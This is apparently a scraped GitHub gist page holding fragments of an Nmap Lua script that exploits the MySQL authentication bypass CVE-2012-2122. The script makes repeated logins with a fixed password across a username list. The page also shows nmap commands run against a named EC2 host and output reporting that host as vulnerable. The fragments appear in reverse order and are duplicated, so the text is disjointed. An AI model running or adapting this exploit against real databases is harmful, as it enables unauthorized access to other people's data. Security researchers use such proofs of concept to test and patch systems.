MW marcwickenden

## gist:2918314
# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
--------------- Timing report ---------------
  hostgroups: min 1, max 100000
  rtt-timeouts: init 1000, min 100, max 10000
  max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
  parallelism: min 0, max 0
  max-retries: 10, host-timeout: 0
  min-rate: 0, max-rate: 0

## gist:2918310
# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
Host is up (0.050s latency).
PORT     STATE SERVICE
3306/tcp open  mysql
| mysql-auth-bypass:
|_  user nse is vulnerable to auth bypass

## file1.lua
  return stdnse.format_output(true, result)

end

## gist:2918126
      socket:close()
    end
  end

## gist:2918123
      status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
      if response.errorcode == 0 then
        table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
        break
      end

## gist:2918119
      status, response = mysql.receiveGreeting( socket )
      if ( not(status) ) then
        stdnse.print_debug(3, SCRIPT_NAME)
        socket:close()
        return response
      end

## gist:2918117
  for username in usernames do
    stdnse.print_debug( "Trying %s ...", username )

    -- try up to 300 times to trigger the vuln
    for i = 0, 300, 1 do
      stdnse.print_debug(2, "attempt number %d", i )

      local status, response = socket:connect(host, port)
      if( not(status) ) then return "  \n  ERROR: Failed to connect to mysql server" end

## gist:2918113
  -- set a reasonable timeout value
  socket:set_timeout(5000)

  -- get our usernames to try
  local usernames = try(unpwdb.usernames())
  local password = "cve-2012-2122"

## gist:2918108
action = function( host, port )

  local socket = nmap.new_socket()
  local catch = function() socket:close() end
  local try = nmap.new_try(catch)
  local result = {}

## gist:2918098
portrule = shortport.port_or_service(3306, "mysql")
	# nmap -v -d --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

	Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:59 BST
	--------------- Timing report ---------------
	hostgroups: min 1, max 100000
	rtt-timeouts: init 1000, min 100, max 10000
	max-scan-delay: TCP 1000, UDP 1000, SCTP 1000
	parallelism: min 0, max 0
	max-retries: 10, host-timeout: 0
	min-rate: 0, max-rate: 0
	# nmap --script=mysql-auth-bypass.nse -p 3306 -Pn --script-args="userdb=usernames.txt" ec2-46-137-134-79.eu-west-1.compute.amazonaws.com

	Starting Nmap 5.61TEST4 ( http://nmap.org ) at 2012-06-12 14:58 BST
	Nmap scan report for ec2-46-137-134-79.eu-west-1.compute.amazonaws.com (46.137.134.79)
	Host is up (0.050s latency).
	PORT STATE SERVICE
	3306/tcp open mysql
	\| mysql-auth-bypass:
	\|_ user nse is vulnerable to auth bypass
	status, response = mysql.loginRequest( socket, { authversion = "post41", charset = response.charset }, username, password, response.salt )
	if response.errorcode == 0 then
	table.insert(result, string.format("user %s is vulnerable to auth bypass", username ) )
	break
	end
	status, response = mysql.receiveGreeting( socket )
	if ( not(status) ) then
	stdnse.print_debug(3, SCRIPT_NAME)
	socket:close()
	return response
	end
	for username in usernames do
	stdnse.print_debug( "Trying %s ...", username )

	-- try up to 300 times to trigger the vuln
	for i = 0, 300, 1 do
	stdnse.print_debug(2, "attempt number %d", i )

	local status, response = socket:connect(host, port)
	if( not(status) ) then return " \n ERROR: Failed to connect to mysql server" end
	-- set a reasonable timeout value
	socket:set_timeout(5000)

	-- get our usernames to try
	local usernames = try(unpwdb.usernames())
	local password = "cve-2012-2122"
	action = function( host, port )

	local socket = nmap.new_socket()
	local catch = function() socket:close() end
	local try = nmap.new_try(catch)
	local result = {}